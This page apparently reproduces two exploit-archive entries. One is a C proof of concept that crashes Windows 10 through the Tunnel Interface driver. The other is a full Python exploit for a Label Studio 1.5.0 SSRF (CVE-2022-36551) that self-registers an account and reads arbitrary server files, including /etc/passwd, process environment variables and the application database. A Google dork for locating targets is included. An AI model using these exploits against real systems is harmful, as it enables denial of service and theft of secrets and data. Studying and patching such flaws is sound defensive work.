<pre><code>// Exploit Title: Tunnel Interface Driver - Denial of Service<br />// Date: 07/15/2022<br />// Exploit Author: ExAllocatePool2<br />// Vendor Homepage: https://www.microsoft.com/<br />// Software Link: https://www.microsoft.com/en-us/software-download/windows10<br />// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)<br />// Tested on: Microsoft Windows<br />// GitHub Repository: https://github.com/Exploitables/MSRC-1<br /><br />#include <Windows.h><br />#include <stdio.h><br /><br />#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"<br /><br />int main(int argc, char** argv);<br /><br />int main(int argc, char** argv)<br />{<br /> HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);<br /> unsigned long long input_output = 0x4242424242424242;<br /> unsigned long bytes_returned = 0x43434343;<br /> unsigned char unused = 0;<br /><br /> SetConsoleTitleA("https://msrc.microsoft.com/");<br /><br /> printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");<br /><br /> if (h_driver == (HANDLE)-1)<br /> {<br /> printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError());<br /> unused = getchar();<br /> return 1;<br /> }<br /> printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);<br /><br /> printf("\n[!] Triggering a denial of service via arbitrary read in 3...");<br /> for (int i = 2; i > 0; i--)<br /> {<br /> Sleep(1000);<br /> printf("\n[!] %d...", i);<br /> }<br /><br /> DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0);<br /><br /> unused = getchar();<br /> printf("\n[-] Exploit failed. The machine should have crashed.");<br /> return 0;<br />}<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)<br /># Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"<br /># Date: 2022-10-03<br /># Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com<br /># Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/<br /># Software Link: https://github.com/heartexlabs/label-studio/releases<br /># Version: <=1.5.0<br /># CVE : CVE-2022-36551<br /># Docker Container: heartexlabs/label-studio<br /><br /># Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition <br /># versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system. <br /># Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote <br /># attacker to create a new account and then exploit the SSRF.<br /><br />#<br /># This exploit has been tested on Label Studio 1.5.0<br />#<br /><br /># Exploit Usage Examples (replace with your target details):<br /># - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd<br /># - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ<br /># - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3<br /><br /><br />import json<br />import argparse<br />import requests<br />import shutil <br />from urllib.parse import urljoin<br />from urllib.parse import urlparse<br />requests.packages.urllib3.disable_warnings() <br /><br /># main function for exploit<br />def main(url, filePath, writePath, username, password, shouldRegister):<br /> # check if the URL is reachable<br /> try:<br /> r = requests.get(url, verify=False)<br /> if r.status_code == 200:<br /> print("[+] URL is reachable")<br /> else:<br /> print("[!] Error: URL is not reachable, check the URL and try again")<br /> exit(1)<br /><br /> except requests.exceptions.RequestException as e:<br /> print("[!] Error: URL is not reachable, check the URL and try again")<br /> exit(1)<br /><br /> session = requests.Session()<br /><br /> login(session, url, username, password, shouldRegister)<br /> print("[+] Logged in")<br /> print("[+] Creating project...")<br /><br /> # Create a temp project<br /> projectDetails = create_project(session, url)<br /> print("[+] Project created, ID: {}".format(projectDetails["id"]))<br /><br /> #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)<br /> print("[+] Attempting to fetch: {}".format(filePath))<br /> fetch_file(session, url, projectDetails["id"], filePath, writePath)<br /><br /> print("[+] Deleting Project.. {}".format(projectDetails["id"]))<br /> delete_project(session, url, projectDetails["id"])<br /> print("[+] Project Deleted")<br /><br /> print("[*] Finished executing exploit")<br /><br /><br /># login, logs the user in<br />def login(session, url, username, password, shouldRegister):<br /><br /> # hit the main page first to get the CSRF token set<br /> r = session.get(url, verify=False)<br /><br /> r = session.post(<br /> urljoin(url, "/user/login"),<br /> data={<br /> "email": username,<br /> "password": password,<br /> "csrfmiddlewaretoken": session.cookies["csrftoken"],<br /> },<br /> verify=False<br /> )<br /><br /> if r.status_code == 200 and r.text.find("The email and password you entered") < 0:<br /> return<br /> elif r.text.find("The email and password you entered") > 0 and shouldRegister:<br /> <br /> print("[!] Account does not exist, registering...")<br /> r = session.post(<br /> urljoin(url, "/user/signup/"),<br /> data={<br /> "email": username,<br /> "password": password,<br /> "csrfmiddlewaretoken": session.cookies["csrftoken"],<br /> 'allow_newsletters': False,<br /> },<br /> )<br /> if r.status_code == 302:<br /> # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)<br /> return<br /><br /> else:<br /> print("[!] Error: Could not login, check the credentials and try again")<br /> exit(1)<br /><br /><br /># create_project creates a temporary project for exploiting the SSRF<br />def create_project(session, url):<br /><br /><br /><br /> r = session.post(<br /> urljoin(url, "/api/projects"),<br /> data={<br /> "title": "TPS Report Finder",<br /> },<br /> verify=False<br /> )<br /><br /> if r.status_code == 200 or r.status_code == 201:<br /> return r.json()<br /> else:<br /> print("[!] Error: Could not create project, check your credentials / permissions")<br /> exit(1)<br /><br />def fetch_file(session, url, projectId, filePath, writePath):<br /><br /> # if scheme is empty prepend file://<br /> parsedFilePath = urlparse(filePath)<br /><br /> if parsedFilePath.scheme == "":<br /> filePath = "file://" + filePath<br /><br /> headers = {<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> }<br /><br /> url = urljoin(url, "/api/projects/{}/import".format(projectId))<br /> r = session.post(url,<br /> data={<br /> "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL<br /> },<br /> headers=headers, <br /> verify=False<br /> )<br /><br /> if r.status_code == 201:<br /> # file found! -- first grab the file path details<br /> fileId = r.json()["file_upload_ids"][0]<br /> r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)<br /> r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)<br /> print("[+] File found!")<br /><br /> # if user wants to write to disk, make it so<br /> if writePath != None:<br /> print("[+] Writing to {}".format(writePath))<br /> # write the file to disk<br /> with open(writePath, 'wb') as handle:<br /> shutil.copyfileobj(r.raw, handle)<br /> handle.close()<br /> return<br /> else:<br /> print("==========================================================")<br /> print(r.text)<br /> print("==========================================================")<br /> return<br /> else:<br /> print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")<br /> print("\t" + r.json()["validation_errors"]["non_field_errors"][0])<br /> return<br /><br /><br />def delete_project(session, url, projectId):<br /><br /> url = urljoin(url, "/api/projects/{}".format(projectId))<br /> r = session.delete(url, verify=False)<br /> if r.status_code == 200 or r.status_code == 204:<br /> return<br /> else:<br /> print( "[!] Error: Could not delete project, check your credentials / permissions")<br /> exit(1)<br /><br />parser = argparse.ArgumentParser()<br /><br />parser.add_argument("--url", required=True, help="Label Studio URL")<br />parser.add_argument("--file", required=True, help="Path to the file you want to fetch")<br />parser.add_argument("--out", required=False, help="Path to write the file. If omitted will be written to STDOUT")<br />parser.add_argument("--username", required=False, help="Username for existing account (email)")<br />parser.add_argument("--password", required=False, help="Password for existing account")<br />parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",<br />)<br /><br />args = parser.parse_args()<br />main(args.url, args.file, args.out, args.username, args.password, args.register)<br /><br /></code></pre>